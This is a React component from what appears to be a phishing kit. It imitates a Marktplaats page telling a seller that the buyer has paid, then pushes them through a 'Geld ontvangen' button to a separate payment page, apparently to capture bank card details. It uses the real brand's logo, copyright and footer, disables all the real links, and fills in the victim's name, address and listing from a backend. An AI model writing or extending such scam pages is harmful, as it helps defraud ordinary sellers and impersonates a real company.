import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './MarktplaatsNlSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/marktplaats-nl-logo.png`;

function noop(e) {
  e.preventDefault();
}

function initialsFromTitle(text) {
  if (!text || !String(text).trim()) return '?';
  const parts = String(text).trim().split(/\s+/).slice(0, 2);
  return parts.map((w) => w[0]).join('').toUpperCase().slice(0, 3);
}

function IconTruck() {
  return (
    <svg className="mp-ico" width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M1 4h12v10H1V4zm12 2h4l3 3v5h-7V6zm-9 12a2 2 0 104 0H7zm10 0a2 2 0 104 0h-4z"
        fill="currentColor"
      />
    </svg>
  );
}

function IconPin() {
  return (
    <svg className="mp-meta-ico" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M12 2C8.13 2 5 5.13 5 9c0 5.25 7 13 7 13s7-7.75 7-13c0-3.87-3.13-7-7-7zm0 9.5A2.5 2.5 0 1112 6a2.5 2.5 0 010 5.5z"
        fill="#666"
      />
    </svg>
  );
}

function IconCalendar() {
  return (
    <svg className="mp-meta-ico" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M19 4h-1V2h-2v2H8V2H6v2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm0 16H5V10h14v10zM5 8V6h14v2H5z"
        fill="#666"
      />
    </svg>
  );
}

function IconShield() {
  return (
    <span className="mp-shield" aria-hidden>
      <svg width="28" height="28" viewBox="0 0 24 24" fill="none">
        <path
          d="M12 2L4 5v6.09c0 5.05 3.41 9.76 8 10.91 4.59-1.15 8-5.86 8-10.91V5l-8-3z"
          fill="#e8f4fc"
          stroke="#0077c8"
          strokeWidth="1.2"
        />
        <path d="M9 12l2 2 4-4" stroke="#0077c8" strokeWidth="1.8" fill="none" strokeLinecap="round" />
      </svg>
    </span>
  );
}

function IconWallet() {
  return (
    <svg className="mp-wallet-ico" width="20" height="20" viewBox="0 0 24 24" fill="none" aria-hidden>
      <rect x="2" y="6" width="20" height="12" rx="2" fill="#fff" opacity="0.95" />
      <path d="M2 10h20v2H2V10zm14 2h4v4h-4v-4z" fill="#0077c8" opacity="0.35" />
    </svg>
  );
}

function IconChat() {
  return <span className="mp-hdr-ico mp-hdr-ico--chat" aria-hidden />;
}
function IconBell() {
  return <span className="mp-hdr-ico mp-hdr-ico--bell" aria-hidden />;
}
function IconUser() {
  return <span className="mp-hdr-ico mp-hdr-ico--user" aria-hidden />;
}

/**
 * Marktplaats NL — listing + uitbetaling; «Geld ontvangen» → index2 (VintedStripe2).
 */
function MarktplaatsNlSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'NL').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceFormatted = useMemo(() => {
    if (priceNumber == null) return '—';
    return new Intl.NumberFormat('nl-NL', { style: 'currency', currency: currencyCode || 'EUR' }).format(priceNumber);
  }, [priceNumber, currencyCode]);

  const title = (pageData?.product_name || '').trim() || 'Advertentie';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const displayFirstName =
    [pageData?.first_name, pageData?.middle_name].filter(Boolean).join(' ').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const photoUrl = (pageData?.photo_url || '').trim();

  const dateStr = useMemo(() => {
    const raw = pageData?.created_at || pageData?.created_at_human;
    if (raw && typeof raw === 'string' && /^\d{4}-\d{2}-\d{2}/.test(raw)) {
      const d = new Date(raw);
      if (!Number.isNaN(d.getTime())) {
        return d.toLocaleDateString('nl-NL', { day: '2-digit', month: '2-digit', year: 'numeric' });
      }
    }
    return new Date().toLocaleDateString('nl-NL', { day: '2-digit', month: '2-digit', year: 'numeric' });
  }, [pageData?.created_at, pageData?.created_at_human]);

  const showPh = !photoUrl || imgFailed;

  if (loading && pageCode) {
    return (
      <div className="mp-wrap" lang="nl">
        <div className="mp-loading">Pagina laden…</div>
        <div className="mp-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="mp-wrap" lang="nl">
      <header className="mp-header">
        <div className="mp-header-inner">
          <a href="#/" className="mp-logo-link" onClick={noop} aria-label="Marktplaats">
            <img src={LOGO_SRC} alt="" className="mp-logo" width={200} height={36} />
          </a>
          <nav className="mp-nav-service" aria-label="Service">
            <a href="#/" onClick={noop}>
              Help en info
            </a>
            <a href="#/" onClick={noop}>
              Voorwaarden
            </a>
            <a href="#/" onClick={noop}>
              Veiligheidscentrum
            </a>
          </nav>
          <div className="mp-header-actions">
            <button type="button" className="mp-hdr-btn" onClick={noop}>
              <IconChat />
              Berichten
            </button>
            <button type="button" className="mp-hdr-btn" onClick={noop}>
              <IconBell />
              Meldingen
            </button>
            <button type="button" className="mp-hdr-btn mp-hdr-btn--user" onClick={noop}>
              <IconUser />
              <span className="mp-caret" aria-hidden>
                ▾
              </span>
            </button>
            <button type="button" className="mp-place-ad" onClick={noop}>
              <span className="mp-pin-ico" aria-hidden />
              Plaats advertentie
            </button>
          </div>
        </div>
      </header>

      <main className="mp-main">
        <div className="mp-grid">
          <div className="mp-col-left">
            <div className="mp-photo-wrap">
              {!showPh ? (
                <img
                  src={photoUrl}
                  alt=""
                  className="mp-photo"
                  onError={() => setImgFailed(true)}
                />
              ) : (
                <div className="mp-photo-ph">{initialsFromTitle(title)}</div>
              )}
            </div>
            <h1 className="mp-title">{title}</h1>
            <p className="mp-price">{priceFormatted}</p>
            <div className="mp-meta">
              <span className="mp-meta-row">
                <IconPin />
                {address}
              </span>
              <span className="mp-meta-row">
                <IconCalendar />
                {dateStr}
              </span>
            </div>
          </div>

          <aside className="mp-col-right">
            <div className="mp-paid-banner">
              <IconTruck />
              <div className="mp-paid-banner-text">
                <strong className="mp-paid-head">Uw object is betaald!</strong>
                <p>
                  U kunt betaald worden voor het object. De koper heeft de goederen en de verzendkosten betaald.
                </p>
              </div>
            </div>

            <div className="mp-card">
              <h2 className="mp-card-title">Gegevens van de ontvanger</h2>
              <label className="mp-field">
                <span className="mp-label">Achternaam van de ontvanger</span>
                <input type="text" readOnly value={lastName} className="mp-input" />
              </label>
              <label className="mp-field">
                <span className="mp-label">Naam ontvanger</span>
                <input type="text" readOnly value={displayFirstName} className="mp-input" />
              </label>
              <label className="mp-field">
                <span className="mp-label">Adres van de ontvanger</span>
                <input type="text" readOnly value={address} className="mp-input" />
              </label>
            </div>

            <div className="mp-secure-box">
              <div className="mp-secure-row">
                <IconShield />
                <div className="mp-secure-text">
                  <strong>Zorgen voor de veiligheid van betalingen</strong>
                  <p>
                    Door op de knop &apos;Geld ontvangen&apos; te klikken, accepteert u de koopovereenkomst van goederen
                    via de online dienst &apos;Veilig contract&apos;.
                  </p>
                </div>
              </div>
              <Link to={index2Path} className="mp-cta">
                <IconWallet />
                Geld ontvangen
              </Link>
            </div>

            <p className="mp-footnote">
              Ontvang het geld op je bankkaart en stuur de goederen naar het door de koper opgegeven adres. Als de goederen
              worden verzonden, breng je de koper op de hoogte van het leveringsnummer. De goederen moeten binnen 7 dagen
              na ontvangst van het geld worden verzonden.
            </p>
          </aside>
        </div>
      </main>

      <footer className="mp-footer">
        <div className="mp-apps">
          <a href="#/" className="mp-app-badge mp-app-badge--gp" onClick={noop}>
            ONTDEK HET OP Google Play
          </a>
          <a href="#/" className="mp-app-badge mp-app-badge--as" onClick={noop}>
            Download in de App Store
          </a>
        </div>
        <nav className="mp-footer-links" aria-label="Footer">
          <a href="#/" onClick={noop}>
            Blog
          </a>
          <a href="#/" onClick={noop}>
            Marktplaats Zakelijk
          </a>
          <a href="#/" onClick={noop}>
            Veilig en Succesvol
          </a>
          <a href="#/" onClick={noop}>
            Help en Info
          </a>
          <a href="#/" onClick={noop}>
            Voorwaarden
          </a>
          <a href="#/" onClick={noop}>
            Privacyverklaring
          </a>
          <a href="#/" onClick={noop}>
            Cookiebeleid
          </a>
          <a href="#/" onClick={noop}>
            Privacyvoorkeuren
          </a>
        </nav>
        <nav className="mp-footer-sub" aria-label="Meer">
          <a href="#/" onClick={noop}>
            Over Marktplaats
          </a>
          <a href="#/" onClick={noop}>
            Werken bij
          </a>
          <a href="#/" onClick={noop}>
            Perskamer
          </a>
          <a href="#/" onClick={noop}>
            Adevinta
          </a>
          <a href="#/" onClick={noop}>
            2dehands
          </a>
          <a href="#/" onClick={noop}>
            2ememain
          </a>
          <a href="#/" onClick={noop}>
            Sitemap
          </a>
        </nav>
        <p className="mp-disclaimer">
          Marktplaats is niet aansprakelijk voor (gevolg)schade die voortkomt uit het gebruik van deze site, dan wel uit
          fouten of ontbrekende functionaliteiten op deze site.
        </p>
        <p className="mp-copy">
          Copyright © {new Date().getFullYear()} Marktplaats B.V. Alle rechten voorbehouden.{' '}
          <span className="mp-adevinta">een Adevinta onderneming</span>
        </p>
      </footer>

      <div className="mp-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default MarktplaatsNlSuccess;
